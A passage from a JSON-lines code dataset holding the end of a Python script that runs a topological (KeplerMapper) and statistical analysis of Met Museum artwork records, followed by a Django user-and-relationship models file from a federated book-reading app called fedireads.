dist_sum=dist_sum+mydist(x,y)\r\n    return dist_sum/len(sub)\r\n\r\ndef l_infinity(x):\r\n    max_dist=0\r\n    for y in sub.values:\r\n        if mydist(x, y) > max_dist:\r\n            max_dist=mydist(x, y)\r\n    return max_dist\r\n\r\n''' Focus on a random subset of 3000. \r\n    Define the color function for the Mapper output graph as Is Public Domain, the variable we are interested in predicting. \r\n    Then drop it from the sample. '''\r\nsubset=sub.sample(3000, random_state=999)\r\nmy_colors=np.array(subset['Is Public Domain'])\r\nsubset=np.array(subset.drop(columns=['Is Public Domain']))\r\n\r\n'''Initialize Mapper'''\r\nmapper: KeplerMapper = kmapper.KeplerMapper(verbose=2)\r\n'''Initialize MDS, our lens function for Mapper.\r\n   Since we are using mydist, a custom metric, we set dissimilarity='precomputed'. 
'''\r\nmds=sklearn.manifold.MDS(dissimilarity='precomputed', random_state=88)\r\n'''Using mydist, compute a distance matrix for our sample and save it.'''\r\ndist_matrix = sp.spatial.distance.squareform(sp.spatial.distance.pdist(subset, metric=mydist))\r\nnp.savetxt('3000pcs.csv', dist_matrix, delimiter=',')\r\n'''Apply MDS to our sample to get our lens.'''\r\nlens=mds.fit_transform(dist_matrix)\r\n'''Using DBSCAN and our metric, generate simplicial complex.'''\r\nsimplicial_complex= mapper.map(lens,\r\n subset,\r\n nr_cubes=10,\r\n overlap_perc=0.4,\r\n clusterer=sklearn.cluster.DBSCAN(eps=5, metric=mydist, algorithm='brute', min_samples=10))\r\n''' Output the simplicial complex, colored by 'Is Public Domain', as a webpage. '''\r\nhtml = mapper.visualize(simplicial_complex, path_html=\"art.html\", color_function=my_colors)\r\n\r\n''' Examples:\r\n1. d(x, y) >= 0\r\nfor x in subset:\r\n for y in subset:\r\n if mydist(x, y) < 0:\r\n print(x, y)\r\n \r\n2. d(x, x) = 0\r\nfor x in subset:\r\n if mydist(x, x) != 0:\r\n print(x)\r\n\r\n3. d(x, y) = 0 => x = y\r\nThis is clear since no artworks share the same Object ID, and the way we calculate distance says that if x, y do not have the same Object ID, we assign a subscore of 1.\r\n\r\n4. d(x, y) = d(y, x)\r\nfor x in subset:\r\n for y in subset:\r\n if mydist(x, y) != mydist(y, x):\r\n print(x, y)\r\n\r\n5. d(x, y) + d(y, z) >= d(x, z)\r\ndef triangle_inequality(x, y, z):\r\n if mydist(x, y) + mydist(y, z) >= mydist(x, z):\r\n return True\r\n else:\r\n print(x, y, z)\r\n return False\r\nfor x in subset:\r\n for y in subset:\r\n for z in subset:\r\n triangle_inequality(x, y, z)\r\n \r\nThe following codes are for determining the subset of the dataset to work on.\r\ndf2=df[feature_names].dropna(axis=0)\r\nnum=num2=0\r\nfor str in df2['Dimensions']:\r\n if len(re.findall('\\((.*?) cm', str)) == 1:\r\n num = num + 1\r\n else:\r\n num2 = num2 + 1\r\n\r\nnum=num2=num3=num4=0\r\nfor str in df2['Dimensions']:\r\n l = re.findall('\\((.*?) 
cm', str)\r\n if len(l) == 1:\r\n nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l[0])\r\n if len(nums) == 1:\r\n num = num + 1\r\n elif len(nums) == 2:\r\n num2 = num2 + 1\r\n elif len(nums) == 3:\r\n num3 = num3 + 1\r\n else:\r\n num4 = num4 + 1\r\n'''\r\nred_nodes=[]\r\nred_nodes.append('cube20_cluster0')\r\nred_nodes.append('cube31_cluster0')\r\nred_nodes.append('cube21_cluster0')\r\nred_nodes.append('cube20_cluster1')\r\nred_nodes.append('cube30_cluster0')\r\nred_nodes.append('cube31_cluster1')\r\nred_nodes.append('cube41_cluster0')\r\nred_nodes.append('cube40_cluster0')\r\nred_nodes.append('cube51_cluster0')\r\nred_nodes.append('cube50_cluster0')\r\nred_nodes.append('cube61_cluster0')\r\nblue_nodes=[]\r\nblue_nodes.append('cube67_cluster0')\r\nblue_nodes.append('cube57_cluster0')\r\nblue_nodes.append('cube58_cluster0')\r\nblue_nodes.append('cube48_cluster0')\r\nblue_nodes.append('cube38_cluster0')\r\nblue_nodes.append('cube47_cluster0')\r\nblue_nodes.append('cube37_cluster0')\r\nblue_nodes.append('cube27_cluster0')\r\nblue_nodes.append('cube36_cluster0')\r\nblue_nodes.append('cube26_cluster0')\r\nblue_nodes.append('cube25_cluster0')\r\nblue_nodes.append('cube16_cluster0')\r\nblue_nodes.append('cube15_cluster0')\r\nred_index=[]\r\nfor x in red_nodes:\r\n red_index.extend(simplicial_complex.get('nodes').get(x))\r\nred_index=list(set(red_index))\r\nred_pd=[]\r\nfor x in red_index:\r\n red_pd.append(my_colors[x])\r\nlen(red_pd)\r\n#276\r\nsum(red_pd)\r\n#225\r\nblue_index = []\r\nfor x in blue_nodes:\r\n blue_index.extend(simplicial_complex.get('nodes').get(x))\r\nblue_index = list(set(blue_index))\r\nblue_pd = []\r\nfor x in blue_index:\r\n blue_pd.append(my_colors[x])\r\nlen(blue_pd)\r\n#1049\r\nsum(blue_pd)\r\n#275\r\ncount = np.array([225, 275])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.000\r\nabd_red=[]\r\nfor x in red_index:\r\n abd_red.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist Begin Date']))\r\nabd_blue=[]\r\nfor x in blue_index:\r\n abd_blue.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist Begin Date']))\r\nsp.stats.ranksums(abd_red, abd_blue)\r\n#RanksumsResult(statistic=-11.606060878281362, pvalue=3.8389682437780603e-31) Significant\r\naed_red=[]\r\nfor x in red_index:\r\n aed_red.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist End Date']))\r\naed_blue=[]\r\nfor x in blue_index:\r\n aed_blue.extend(list(sub[sub['Object ID']==subset[x][0]]['Artist End Date']))\r\nsp.stats.ranksums(aed_red, aed_blue)\r\n#RanksumsResult(statistic=-10.265227229606868, pvalue=1.0108271873662676e-24) Significant\r\nnp.median(aed_red)\r\n#1807.5\r\nnp.median(aed_blue)\r\n#1920.0\r\nnp.median(abd_red)\r\n#1744.0\r\nnp.median(abd_blue)\r\n#1850.0\r\nobd_red=[]\r\nfor x in red_index:\r\n obd_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object Begin Date']))\r\nobd_blue = []\r\nfor x in blue_index:\r\n obd_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object Begin Date']))\r\nsp.stats.ranksums(obd_red, obd_blue)\r\n#RanksumsResult(statistic=-11.489551203376761, pvalue=1.4888338343397409e-30) Significant\r\noed_red=[]\r\nfor x in red_index:\r\n oed_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object End Date']))\r\noed_blue = []\r\nfor x in blue_index:\r\n oed_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Object End Date']))\r\nsp.stats.ranksums(oed_red, oed_blue)\r\n#RanksumsResult(statistic=-10.972948365635876, pvalue=5.1563080839906435e-28) 
Significant\r\nnp.median(obd_red)\r\n#1760.0\r\nnp.median(obd_blue)\r\n#1880.0\r\nnp.median(oed_red)\r\n#1792.5\r\nnp.median(oed_blue)\r\n#1890.0\r\ndim_red=[]\r\nfor x in red_index:\r\n dim_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Dimensions']))\r\ndim_blue = []\r\nfor x in blue_index:\r\n dim_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Dimensions']))\r\nsp.stats.ranksums(dim_red, dim_blue)\r\n#RanksumsResult(statistic=16.159308476905167, pvalue=9.76509242707288e-59) Significant\r\nlen_red=[]\r\nfor x in red_index:\r\n len_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Length']))\r\nlen_blue = []\r\nfor x in blue_index:\r\n len_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Length']))\r\nsp.stats.ranksums(len_red, len_blue)\r\n#RanksumsResult(statistic=14.8747848911398, pvalue=4.805270833716341e-50)\r\nwid_red=[]\r\nfor x in red_index:\r\n wid_red.extend(list(sub[sub['Object ID'] == subset[x][0]]['Width']))\r\nwid_blue = []\r\nfor x in blue_index:\r\n wid_blue.extend(list(sub[sub['Object ID'] == subset[x][0]]['Width']))\r\nsp.stats.ranksums(wid_red, wid_blue)\r\n#RanksumsResult(statistic=16.558429252469864, pvalue=1.3918027191571795e-61)\r\nnp.median(dim_red)\r\n#1893.7150000000001\r\nnp.median(dim_blue)\r\n#109.06\r\nnp.median(len_red)\r\n#41.599999999999994\r\nnp.median(len_blue)\r\n#11.2\r\nnp.median(wid_red)\r\n#42.7\r\nnp.median(wid_blue)\r\n#8.9\r\npd.DataFrame(subset)[8].unique()\r\n#array([ 4., 13., 3., 10., 0., 6., 5., 12., 2., 1., 14., 8., 9.])\r\nred_0=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 0:\r\n red_0.append(1)\r\n else:\r\n red_0.append(0)\r\nblue_0=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 0:\r\n blue_0.append(1)\r\n else:\r\n blue_0.append(0)\r\ncount = np.array([59, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#5.6476517832074895e-53\r\nred_1=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 1:\r\n red_1.append(1)\r\n else:\r\n red_1.append(0)\r\nblue_1=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 1:\r\n blue_1.append(1)\r\n else:\r\n blue_1.append(0)\r\ncount = np.array([2, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.006\r\nred_2=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 2:\r\n red_2.append(1)\r\n else:\r\n red_2.append(0)\r\nblue_2=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 2:\r\n blue_2.append(1)\r\n else:\r\n blue_2.append(0)\r\ncount = np.array([0, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#Invalid\r\nred_3=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 3:\r\n red_3.append(1)\r\n else:\r\n red_3.append(0)\r\nblue_3=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 3:\r\n blue_3.append(1)\r\n else:\r\n blue_3.append(0)\r\ncount = np.array([47, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.5429344587157824e-42\r\nred_4=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == 
subset[x][0]]['depart_cat'])[0] == 4:\r\n red_4.append(1)\r\n else:\r\n red_4.append(0)\r\nblue_4=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 4:\r\n blue_4.append(1)\r\n else:\r\n blue_4.append(0)\r\ncount = np.array([0, 1048])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#8.578128248147642e-289\r\nred_5=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 5:\r\n red_5.append(1)\r\n else:\r\n red_5.append(0)\r\nblue_5=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 5:\r\n blue_5.append(1)\r\n else:\r\n blue_5.append(0)\r\ncount = np.array([82, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.157917716649403e-74\r\nred_6=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 6:\r\n red_6.append(1)\r\n else:\r\n red_6.append(0)\r\nblue_6=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 6:\r\n blue_6.append(1)\r\n else:\r\n blue_6.append(0)\r\ncount = np.array([69, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#4.018824778080052e-62\r\nred_8=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 8:\r\n red_8.append(1)\r\n else:\r\n red_8.append(0)\r\nblue_8=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 8:\r\n blue_8.append(1)\r\n else:\r\n blue_8.append(0)\r\n#invalid\r\nred_9=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 9:\r\n red_9.append(1)\r\n else:\r\n red_9.append(0)\r\nblue_9=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 9:\r\n blue_9.append(1)\r\n else:\r\n blue_9.append(0)\r\n#invalid\r\nred_10=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 10:\r\n red_10.append(1)\r\n else:\r\n red_10.append(0)\r\nblue_10=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 10:\r\n blue_10.append(1)\r\n else:\r\n blue_10.append(0)\r\ncount = np.array([7, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#2.3198662946472394e-07\r\nred_12=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 12:\r\n red_12.append(1)\r\n else:\r\n red_12.append(0)\r\nblue_12=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 12:\r\n blue_12.append(1)\r\n else:\r\n blue_12.append(0)\r\ncount = np.array([7, 1])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#3.1990577036414517e-06\r\nred_13=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 13:\r\n red_13.append(1)\r\n else:\r\n red_13.append(0)\r\nblue_13=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 13:\r\n blue_13.append(1)\r\n else:\r\n blue_13.append(0)\r\ncount = np.array([3, 0])\r\nnobs = np.array([276, 1049])\r\nstat, pval = proportions_ztest(count, 
nobs)\r\nprint('{0:0.3f}'.format(pval))\r\n#0.0007234362029969521\r\nred_14=[]\r\nfor x in red_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 14:\r\n red_14.append(1)\r\n else:\r\n red_14.append(0)\r\nblue_14=[]\r\nfor x in blue_index:\r\n if list(sub[sub['Object ID'] == subset[x][0]]['depart_cat'])[0] == 14:\r\n blue_14.append(1)\r\n else:\r\n blue_14.append(0)\r\n#invalid\r\n#reduced=['depart_4']\r\n'''Compare full model with reduced model'''\r\nlogreg = LogisticRegression()\r\nX_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(pd.DataFrame(subset)[13], my_colors, test_size=0.2)\r\nmodel = logreg.fit(np.reshape(np.array(X_train),(-1, 1)), y_train)\r\npredictions = logreg.predict(np.reshape(np.array(X_test), (-1,1)))\r\nmodel.score(np.reshape(np.array(X_test), (-1, 1)), y_test)\r\n#0.5216666666666666\r\nX=subset[['Artist Begin Date', 'Artist End Date', 'Object Begin Date', 'Object End Date', 'Dimensions', 'Length', 'Width', 'American Decorative Arts', 'Arms and Armor', 'Arts of Africa, Oceania, and the Americas', 'Asian Art', 'Drawings and Prints', 'European Paintings', 'European Sculpture and Decorative Arts', 'Islamic Art', 'Medieval Art', 'Modern and Contemporary Art', 'Photographs', 'Robert Lehman Collection']]\r\nmodel.score(X_test, y_test)\r\n#0.7383333333333333\r\n\r\n#For sub, reduced model accuracy score is 0.5530340897730681, and full model accauray score is 0.7257822653204039\r\n\r\n''' Artist Begin Date & Artist End Date v.s. N.A. '''\r\n'''df = pd.read_csv('MetObjects.csv', encoding=\"ISO-8859-1\")\r\nfeature_names = ['Is Public Domain', 'Object ID', 'Department', 'Object Name', 'Artist Begin Date', 'Artist End Date', 'Object Begin Date', 'Object End Date', 'Medium', 'Dimensions', 'Credit Line', 'Classification']\r\nX = df[feature_names]\r\nX=X[X['Object Begin Date'] < X['Object End Date']]\r\nX_na=X[pd.isna(X['Artist Begin Date'])]\r\nX_na=X_na[pd.isna(X_na['Artist End Date'])]\r\nX_na.drop(columns=['Artist Begin Date', 'Artist End Date'], inplace=True)\r\nX_na=X_na.dropna(axis=0)\r\nlength=[]\r\nwidth=[]\r\nfor index, row in X_na.iterrows():\r\n l1 = re.findall('\\((.*?) 
cm', row[7])\r\n if len(l1) == 1:\r\n nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l1[0])\r\n if len(nums) == 2:\r\n X_na.loc[index, 'Dimensions'] = float(nums[0]) * float(nums[1])\r\n length.append(float(nums[0]))\r\n width.append(float(nums[1]))\r\n else:\r\n X_na.drop(index, inplace=True)\r\n else:\r\n X_na.drop(index, inplace=True)\r\nX_na['Length']=length\r\nX_na['Width']=width\r\nmax_begin2=max(X_na['Object Begin Date'])-min(X_na['Object Begin Date'])\r\nmax_end2=max(X_na['Object End Date'])-min(X_na['Object End Date'])\r\nmax_dim2=max(X_na['Dimensions'])-min(X_na['Dimensions'])\r\nmax_len2=max(X_na['Length'])-min(X_na['Length'])\r\nmax_wid2=max(X_na['Width'])-min(X_na['Width'])\r\nmydict_name2={}\r\nmydict_medium2={}\r\nmydict_cl2={}\r\nmydict_class2={}\r\nX_na['Department'] = X_na['Department'].astype('category')\r\nX_na['Object Name'] = X_na['Object Name'].astype('category')\r\nX_na['Medium'] = X_na['Medium'].astype('category')\r\nX_na['Credit Line'] = X_na['Credit Line'].astype('category')\r\nX_na['Classification'] = X_na['Classification'].astype('category')\r\nX_na['depart_cat'] = X_na['Department'].cat.codes\r\nX_na['name_cat'] = X_na['Object Name'].cat.codes\r\nX_na['med_cat'] = X_na['Medium'].cat.codes\r\nX_na['cl_cat'] = X_na['Credit Line'].cat.codes\r\nX_na['class_cat'] = X_na['Classification'].cat.codes\r\ndelimiters = ' and ', ' or ', ' ', ',', ';', '&', '(?)', '(', ')', '/', '|', '.'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor idx, item in enumerate(X_na['name_cat']):\r\n mydict_name2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Object Name'][idx])))\r\nfor idx, item in enumerate(X_na['med_cat']):\r\n mydict_medium2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Medium'][idx])))\r\nfor idx, item in enumerate(X_na['cl_cat']):\r\n delims = ', ', '; '\r\n rePattern = '|'.join(map(re.escape, delims))\r\n mydict_cl2[item]=list(filter(lambda a: a != '', re.split(rePattern, X_na['Credit Line'][idx])))\r\nfor idx, item in enumerate(X_na['class_cat']):\r\n mydict_class2[item]=list(filter(lambda a: a != '', re.split(regexPattern, X_na['Classification'][idx])))\r\n mydict_class2[item]=list(map(lambda x: x.split('-')[0], mydict_class2.get(item)))\r\nX_na.drop(columns=['Department', 'Object Name', 'Medium', 'Credit Line', 'Classification'], inplace=True)\r\nsub.drop(columns=['Artist Begin Date', 'Artist End Date'], inplace=True)\r\ndef mydist(x, y):\r\n sc1=0\r\n sc2=0\r\n sc3=0\r\n sc4=0\r\n sc5=0\r\n sc6=0\r\n sc7=0\r\n sc8=0\r\n sc9=0\r\n sc10=0\r\n sc11=0\r\n sc12=0\r\n if x[0] != y[0]:\r\n sc1 = 1\r\n if x[1] != y[1]:\r\n sc2 = 1\r\n sc3=abs(x[2]-y[2])/max_begin\r\n sc4=abs(x[3]-y[3])/max_end\r\n sc5 = abs(x[4]-y[4])/max_dim\r\n sc6 = abs(x[5]-y[5])/max_len\r\n sc7 = abs(x[6]-y[6])/max_wid\r\n if x[7] != y[7]:\r\n sc8=1\r\n sc9=cat_dist(set(mydict_name.get(x[8])), set(mydict_name.get(y[8])), 'Object Name')\r\n sc10= cat_dist(set(mydict_medium.get(x[9])), set(mydict_medium.get(y[9])), 'Medium')\r\n sc11 = cat_dist(set(mydict_cl.get(x[10])), set(mydict_cl.get(x[10])), 'Credit Line')\r\n sc12 = cat_dist(set(mydict_class.get(x[11])), set(mydict_class.get(y[11])), 'Classification')\r\n return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12\r\ndef mydist2(x, y):\r\n sc1=0\r\n sc2=0\r\n sc3=0\r\n sc4=0\r\n sc5=0\r\n sc6=0\r\n sc7=0\r\n sc8=0\r\n sc9=0\r\n sc10=0\r\n sc11=0\r\n sc12=0\r\n if x[0] != y[0]:\r\n sc1 = 1\r\n if x[1] != y[1]:\r\n sc2 = 1\r\n sc3=abs(x[2]-y[2])/max_begin2\r\n sc4=abs(x[3]-y[3])/max_end2\r\n sc5 = 
abs(x[4]-y[4])/max_dim2\r\n sc6 = abs(x[5]-y[5])/max_len2\r\n sc7 = abs(x[6]-y[6])/max_wid2\r\n if x[7] != y[7]:\r\n sc8=1\r\n sc9=cat_dist(set(mydict_name2.get(x[8])), set(mydict_name2.get(y[8])), 'Object Name')\r\n sc10= cat_dist(set(mydict_medium2.get(x[9])), set(mydict_medium2.get(y[9])), 'Medium')\r\n sc11 = cat_dist(set(mydict_cl2.get(x[10])), set(mydict_cl2.get(x[10])), 'Credit Line')\r\n sc12 = cat_dist(set(mydict_class2.get(x[11])), set(mydict_class2.get(y[11])), 'Classification')\r\n return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12\r\nl1=[21,8,12,15,9,11,20]\r\nl2=[9,22,11,16,6,6,9,5,17,10,8,16,7]\r\nsp.stats.ranksums(l1,l2)\r\nRanksumsResult(statistic=1.2282647202130073, pvalue=0.21934761016862558)\r\nsp.stats.ranksums(np.array(df['Dimensions']), np.array(df2['Dimensions']))\r\nRanksumsResult(statistic=5.524310971077592, pvalue=3.307811462120068e-08)\r\nnp.median(np.array(df['Dimensions']))\r\n691.67\r\nnp.median(np.array(df2['Dimensions']))\r\n170.81\r\nnp.mean(np.array(df['Dimensions']))\r\n1159.1737500000002\r\nnp.mean(np.array(df2['Dimensions']))\r\n1237.455437323944\r\nn, bins, patches = plt.hist(df['Dimensions'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Dimensions'], 100, facecolor='blue')\r\nplt.show()\r\nTest Is Public Domain\r\ncount = np.array([79, 108])\r\nnobs = np.array([96, 142])\r\nstat, pval = proportions_ztest(count, nobs)\r\npval\r\n0.2501178231151471\r\nsp.stats.ranksums(np.array(df['Object Begin Date']), np.array(df2['Object Begin Date']))\r\nRanksumsResult(statistic=5.7123889544597715, pvalue=1.1140110866430812e-08)\r\nsp.stats.ranksums(np.array(df['Object End Date']), np.array(df2['Object End Date']))\r\nRanksumsResult(statistic=4.681798372049257, pvalue=2.843691115489764e-06)\r\nn, bins, patches = plt.hist(df['Object Begin Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Object Begin Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nsp.stats.ranksums(np.array(df['Length']), np.array(df2['Length']))\r\nRanksumsResult(statistic=5.182699940036491, pvalue=2.1869672333507455e-07)\r\nsp.stats.ranksums(np.array(df['Width']), np.array(df2['Width']))\r\nRanksumsResult(statistic=4.8871488232930655, pvalue=1.0230675898872156e-06)\r\n'''","sub_path":"met dataset.py","file_name":"met dataset.py","file_ext":"py","file_size_in_byte":30448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53184988","text":"''' database schema for user data '''\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.dispatch import receiver\n\nfrom fedireads import activitypub\nfrom fedireads.models.shelf import Shelf\nfrom fedireads.settings import DOMAIN\nfrom fedireads.signatures import create_key_pair\nfrom .base_model import FedireadsModel\n\n\nclass User(AbstractUser):\n ''' a user who wants to read books '''\n private_key = models.TextField(blank=True, null=True)\n public_key = models.TextField(blank=True, null=True)\n inbox = models.CharField(max_length=255, unique=True)\n shared_inbox = models.CharField(max_length=255, blank=True, null=True)\n federated_server = models.ForeignKey(\n 'FederatedServer',\n on_delete=models.PROTECT,\n null=True,\n )\n 
outbox = models.CharField(max_length=255, unique=True)\n    summary = models.TextField(blank=True, null=True)\n    local = models.BooleanField(default=True)\n    fedireads_user = models.BooleanField(default=True)\n    localname = models.CharField(\n        max_length=255,\n        null=True,\n        unique=True\n    )\n    # name is your display name, which you can change at will\n    name = models.CharField(max_length=100, blank=True, null=True)\n    avatar = models.ImageField(upload_to='avatars/', blank=True, null=True)\n    following = models.ManyToManyField(\n        'self',\n        symmetrical=False,\n        through='UserFollows',\n        through_fields=('user_subject', 'user_object'),\n        related_name='followers'\n    )\n    follow_requests = models.ManyToManyField(\n        'self',\n        symmetrical=False,\n        through='UserFollowRequest',\n        through_fields=('user_subject', 'user_object'),\n        related_name='follower_requests'\n    )\n    blocks = models.ManyToManyField(\n        'self',\n        symmetrical=False,\n        through='UserBlocks',\n        through_fields=('user_subject', 'user_object'),\n        related_name='blocked_by'\n    )\n    favorites = models.ManyToManyField(\n        'Status',\n        symmetrical=False,\n        through='Favorite',\n        through_fields=('user', 'status'),\n        related_name='favorite_statuses'\n    )\n    remote_id = models.CharField(max_length=255, null=True, unique=True)\n    created_date = models.DateTimeField(auto_now_add=True)\n    updated_date = models.DateTimeField(auto_now=True)\n    manually_approves_followers = models.BooleanField(default=False)\n\n    @property\n    def activitypub_serialize(self):\n        return activitypub.get_actor(self)\n\n\nclass UserRelationship(FedireadsModel):\n    ''' many-to-many through table for followers '''\n    user_subject = models.ForeignKey(\n        'User',\n        on_delete=models.PROTECT,\n        related_name='%(class)s_user_subject'\n    )\n    user_object = models.ForeignKey(\n        'User',\n        on_delete=models.PROTECT,\n        related_name='%(class)s_user_object'\n    )\n    # 'follows', or 'follow_request' for pending; TODO: blocking?\n    relationship_id = models.CharField(max_length=100)\n\n    class Meta:\n        abstract = True\n        constraints = [\n            models.UniqueConstraint(\n                fields=['user_subject', 'user_object'],\n                name='%(class)s_unique'\n            ),\n            models.CheckConstraint(\n                check=~models.Q(user_subject=models.F('user_object')),\n                name='%(class)s_no_self'\n            )\n        ]\n\n    def get_remote_id(self):\n        ''' use the relationship status in the remote_id '''\n        base_path = self.user_subject.remote_id\n        return '%s#%s/%d' % (base_path, self.status, self.id)\n\n\nclass UserFollows(UserRelationship):\n    @property\n    def status(self):\n        return 'follows'\n\n    @classmethod\n    def from_request(cls, follow_request):\n        return cls(\n            user_subject=follow_request.user_subject,\n            user_object=follow_request.user_object,\n            relationship_id=follow_request.relationship_id,\n        )\n\n\nclass UserFollowRequest(UserRelationship):\n    @property\n    def status(self):\n        return 'follow_request'\n\n\nclass UserBlocks(UserRelationship):\n    @property\n    def status(self):\n        return 'blocks'\n\n\nclass FederatedServer(FedireadsModel):\n    ''' store which servers we federate with '''\n    server_name = models.CharField(max_length=255, unique=True)\n    # federated, blocked, whatever else\n    status = models.CharField(max_length=255, default='federated')\n    # is it mastodon, fedireads, etc\n    application_type = models.CharField(max_length=255, null=True)\n    application_version = models.CharField(max_length=255, null=True)\n\n\n@receiver(models.signals.pre_save, sender=User)\ndef execute_before_save(sender, instance, *args, **kwargs):\n    ''' populate fields for new local users '''\n    # this user already exists, no need to populate fields\n    
if instance.id or not instance.local:\n return\n\n # populate fields for local users\n instance.remote_id = 'https://%s/user/%s' % (DOMAIN, instance.username)\n instance.localname = instance.username\n instance.username = '%s@%s' % (instance.username, DOMAIN)\n instance.actor = instance.remote_id\n instance.inbox = '%s/inbox' % instance.remote_id\n instance.shared_inbox = 'https://%s/inbox' % DOMAIN\n instance.outbox = '%s/outbox' % instance.remote_id\n if not instance.private_key:\n instance.private_key, instance.public_key = create_key_pair()\n\n\n@receiver(models.signals.post_save, sender=User)\ndef execute_after_save(sender, instance, created, *args, **kwargs):\n ''' create shelves for new users '''\n if not instance.local or not created:\n return\n\n shelves = [{\n 'name': 'To Read',\n 'identifier': 'to-read',\n }, {\n 'name': 'Currently Reading',\n 'identifier': 'reading',\n }, {\n 'name': 'Read',\n 'identifier': 'read',\n }]\n\n for shelf in shelves:\n Shelf(\n name=shelf['name'],\n identifier=shelf['identifier'],\n user=instance,\n editable=False\n ).save()\n","sub_path":"fedireads/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 